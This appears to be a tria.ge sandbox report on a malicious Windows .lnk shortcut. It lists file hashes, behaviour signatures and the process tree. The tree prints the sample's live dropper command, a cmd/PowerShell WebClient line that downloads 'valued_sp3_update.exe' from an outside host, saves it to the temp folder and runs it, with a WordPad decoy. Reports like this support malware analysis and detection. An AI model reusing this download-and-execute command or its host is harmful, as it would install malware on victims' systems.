Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
02/02/2023, 13:36
Static task
static1
Behavioral task
behavioral1
Sample
43843_8439_8329098.lnk
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
43843_8439_8329098.lnk
Resource
win10v2004-20220812-en
General
-
Target
43843_8439_8329098.lnk
-
Size
130KB
-
MD5
2fcb95c29131b2bdb9f864f492a3bcd1
-
SHA1
7ffa77710ae6a95b3759643852a5a829c550a36e
-
SHA256
36a4e3cebb2ed11077cca219e6033a31a60fc8924ed48b79e216d4ceefcc08f5
-
SHA512
a527d90b15ce7556ae167aba16cfbda8d213b87ec8d2e095ba57060ae7af3315de7bfcbbaddca8e7ad4ff8c7f6a40f5f9e3b8bdea25292a24f2d31740368baa7
-
SSDEEP
3072:EE+n8y1Bzt+mwV4jUs8Nu+GEodNn6/f1DaiSGeQnHkJ6U:EE+nPvxwV28NTGEoEAbGXHM6U
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 6 5008 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 5008 powershell.exe 5008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 5008 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2132 wordpad.exe 2132 wordpad.exe 2132 wordpad.exe 2132 wordpad.exe 2132 wordpad.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3228 wrote to memory of 1648 3228 cmd.exe 80 PID 3228 wrote to memory of 1648 3228 cmd.exe 80 PID 1648 wrote to memory of 5008 1648 cmd.exe 81 PID 1648 wrote to memory of 5008 1648 cmd.exe 81 PID 1648 wrote to memory of 2132 1648 cmd.exe 82 PID 1648 wrote to memory of 2132 1648 cmd.exe 82
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\43843_8439_8329098.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /R set U=http:/&powershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"&"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys&C:\Users\Admin\AppData\Local\Temp/Up&g3Jerl:+hqw^-BdjJd&cjM34{_________2⤵
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$J=new-object system.net.webclient;$J.downloadfile($env:U+'/myscs.ca/valued_sp3_update.exe',$env:tmp+'\Up.exe');"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5008
-
-
C:\Program Files\windows nt\accessories\wordpad.exe"C:\Program Files\windows nt\accessories\wordpad" c:\pagefile.sys3⤵
- Suspicious use of SetWindowsHookEx
PID:2132
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:4876